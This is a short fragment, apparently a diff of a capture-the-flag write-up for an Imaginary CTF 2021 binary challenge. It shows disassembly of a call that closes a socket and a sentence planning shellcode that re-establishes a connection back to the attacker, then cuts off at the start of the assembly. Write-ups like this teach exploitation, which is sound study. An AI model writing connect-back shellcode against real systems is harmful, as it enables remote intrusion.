krzysztof-bochm/Imaginary-CTF-2021-Writeups/It's Not Web, I Swear!.md

    0x40153a <respond+1133>    mov    edi, 1
    0x40153f <respond+1138>    call   close@plt <close@plt>
 ```
-Therefor we have to reestablish connection to us.
+Therefor we have to reestablish connection to us in our shellcode:
 ```
 [bits 64]
 start: